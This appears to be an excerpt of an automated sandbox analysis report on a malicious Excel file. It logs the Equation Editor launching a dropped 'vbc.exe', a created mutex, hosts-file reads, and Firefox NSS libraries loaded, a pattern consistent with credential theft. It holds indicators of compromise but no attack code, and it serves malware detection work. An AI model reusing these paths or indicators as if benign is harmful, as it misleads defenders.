              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\A8AD17B7C-343A2EC6-C0602CB5-9944F058-8D4F5E2C
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670503638.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.650611198.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670671423.0000000004C5C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.653828534.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670627117.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670709418.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670737148.0000000004C74000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: vbc.exe, 00000009.00000003.668106753.0000000004BB4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.635922256.0000000004258000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668134020.0000000004BB8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668076743.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668160871.0000000004BBC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668189443.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.636520930.0000000004260000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: vbc.exe, 00000009.00000003.663041050.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.661124964.0000000003430000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: vbc.exe, 00000009.00000003.668313210.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668284155.0000000004BD4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668256853.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668341274.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668393019.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668368353.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: vbc.exe, 00000009.00000003.668106753.0000000004BB4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668076743.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: vbc.exe, 00000009.00000003.669966606.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669869061.0000000004C14000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669615990.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669824164.0000000004C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669789751.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.646010786.0000000004260000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670394280.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.649724763.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670466490.0000000004C38000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.649258580.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670421304.0000000004C34000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: vbc.exe, 00000009.00000003.654388488.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670671423.0000000004C5C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.653828534.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.654424583.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670627117.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670709418.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670765863.0000000004C78000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670737148.0000000004C74000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: vbc.exe, 00000004.00000002.604891788.0000000000E60000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: vbc.exe, 00000009.00000003.668284155.0000000004BD4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668256853.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.638371506.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.637461851.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: vbc.exe, 00000009.00000003.669966606.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670283394.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669869061.0000000004C14000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669615990.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670084410.0000000004C1C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669824164.0000000004C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.646924205.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669789751.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: vbc.exe, 00000009.00000003.644622342.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669615990.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669824164.0000000004C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.645151858.0000000004270000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669789751.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: vcruntime140.i386.pdbGCTL source: vbc.exe, 00000009.00000003.667949909.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671847447.000000000423C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668042331.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: vbc.exe, 00000009.00000003.648741288.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670394280.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.649258580.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670421304.0000000004C34000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: vbc.exe, 00000009.00000003.668106753.0000000004BB4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668134020.0000000004BB8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.635239654.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668076743.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: vbc.exe, 00000009.00000003.642227759.0000000004258000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.641564050.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: vbc.exe, 00000009.00000003.633259338.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: vbc.exe, 00000009.00000003.668106753.0000000004BB4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.635922256.0000000004258000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668134020.0000000004BB8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.635239654.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668076743.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668160871.0000000004BBC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: vbc.exe, 00000009.00000003.651566278.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.652579331.0000000004284000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670671423.0000000004C5C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670627117.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.653758258.000000000426C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: vbc.exe, 00000009.00000003.648741288.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670394280.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.647892915.0000000004258000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256 source: vbc.exe, 00000004.00000002.604891788.0000000000E60000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdb source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658024434.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658085566.0000000000304000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: vbc.exe, 00000009.00000003.663041050.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.661124964.0000000003430000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: vbc.exe, 00000009.00000003.643422773.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.642836156.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670671423.0000000004C5C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670824490.0000000004C84000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670627117.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.654985743.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670800278.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655462519.0000000004258000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670709418.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670765863.0000000004C78000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670737148.0000000004C74000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: vbc.exe, 00000009.00000003.668256853.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.637461851.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.637012145.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669869061.0000000004C14000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669615990.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669824164.0000000004C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669789751.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.641564050.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.641491323.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: vbc.exe, 00000009.00000003.633947571.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668076743.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: vbc.exe, 00000009.00000003.669966606.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670283394.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670321652.0000000004C24000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669869061.0000000004C14000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669615990.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670084410.0000000004C1C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669824164.0000000004C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.646924205.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669789751.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.647892915.0000000004258000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: vbc.exe, 00000009.00000003.668313210.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668284155.0000000004BD4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668256853.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668341274.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668368353.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.639832040.000000000425C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670503638.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.651029417.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670527843.0000000004C4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp
